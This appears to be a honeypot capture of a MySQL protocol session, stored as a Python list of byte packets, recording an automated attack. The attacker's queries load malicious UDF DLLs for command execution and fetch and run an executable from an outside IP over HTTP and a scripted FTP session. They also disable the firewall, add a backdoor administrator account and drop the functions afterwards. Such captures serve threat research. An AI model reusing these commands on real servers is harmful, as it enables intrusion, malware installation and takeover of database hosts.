stream = [('out', b'4\x00\x00\x00\x0a5.7.16\x00\x00\x00\x12gaaaaaaaa\x00,\xa2!\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00            \x00'),
('in', b'&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00'),
('out', b'\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00'),
('in', b'6\x00\x00\x00\x03create function xpdl3 returns string soname \x27udf.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'9\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27xsa.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION downloader RETURNS string SONAME \x27xsa.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'F\x00\x00\x00\x03create function cmdshell returns string soname "lib_mysqludf_sys.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'H\x00\x00\x00\x03create function downloader returns string soname "lib_mysqludf_sys.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27udf32.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27udf33.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'=\x00\x00\x00\x03create function downloader returns string soname "udf32.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'=\x00\x00\x00\x03create function downloader returns string soname "udf33.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'9\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27xsa.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION downloader RETURNS string SONAME \x27xsa.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b';\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27xijin.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'=\x00\x00\x00\x03CREATE FUNCTION downloader RETURNS string SONAME \x27xijin.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'<\x00\x00\x00\x03CREATE FUNCTION cmdshell RETURNS string SONAME \x27xijin1.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'>\x00\x00\x00\x03CREATE FUNCTION downloader RETURNS string SONAME \x27xijin1.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'6\x00\x00\x00\x03CREATE FUNCTION shell RETURNS string SONAME \x27udf.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'9\x00\x00\x00\x03CREATE FUNCTION cmdshelv RETURNS string SONAME \x27udf.dll\x27'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'F\x00\x00\x00\x03create function cmdshell returns string soname "lib_mysqludf_sys.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'H\x00\x00\x00\x03create function downloader returns string soname "lib_mysqludf_sys.dll"'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'?\x00\x00\x00\x03select downloader("http://42.51.40.149/gs8.exe","C:\x5c\x5cgs8.exe")'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b':\x00\x00\x00\x03select xpdl3("http://42.51.40.149/gs8.exe","C:\x5c\x5cgs8.exe")'),
('out', b'\x07\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00'),
('in', b'\x1f\x00\x00\x00\x03select cmdshell("C:\x5c\x5cgs8.exe")'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'"\x00\x00\x00\x03select shell("cmd","C:\x5c\x5cgs8.exe")'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'-\x00\x00\x00\x03select cmdshell("C:\x5c\x5cgs8.exe & c:\x5c\x5cgs8.exe")'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'k\x00\x00\x00\x03select cmdshell("cmd.exe cmd/c net user ASP.NET Gvip1980 /add&net localgroup administrators ASP.NET /add")'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'k\x00\x00\x00\x03select cmdshelv(\x27cmd.exe cmd/c net user ASP.NET Gvip1980 /add&net localgroup administrators ASP.NET /add\x27)'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'h\x00\x00\x00\x03select shell("cmd.exe cmd/c net user ASP.NET Gvip1980 /add&net localgroup administrators ASP.NET /add")'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x0d\x01\x00\x00\x03select cmdshell("cmd.exe cmd/c net stop sharedaccess&echo open 42.51.40.149>>ge.dat&echo 123>>ge.dat&echo 123>>ge.dat&echo bin>>ge.dat&echo get gs8.exe>>ge.dat&echo get gs8.exe>>ge.dat&echo bye>>ge.dat&ftp -s:ge.dat&gs8.exe&gs8.exe&del ge.dat&del gs8.exe&del gs8.exe")'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'.\x00\x00\x00\x03Drop FUNCTION IF EXISTS lib_mysqludf_sys_info'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b' \x00\x00\x00\x03Drop FUNCTION IF EXISTS sys_get'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b' \x00\x00\x00\x03Drop FUNCTION IF EXISTS sys_set'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'!\x00\x00\x00\x03Drop FUNCTION IF EXISTS sys_exec'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'!\x00\x00\x00\x03Drop FUNCTION IF EXISTS sys_eval'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'!\x00\x00\x00\x03Drop FUNCTION IF EXISTS cmdshell'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'#\x00\x00\x00\x03Drop FUNCTION IF EXISTS downloader'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x1e\x00\x00\x00\x03Drop FUNCTION IF EXISTS shell'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x05\x00\x00\x00\x03exit'),
('out', b'\x13\x00\x00\x01\xff\x00\x00#     Learn SQL!'),
('in', b'\x01\x00\x00\x00\x01')]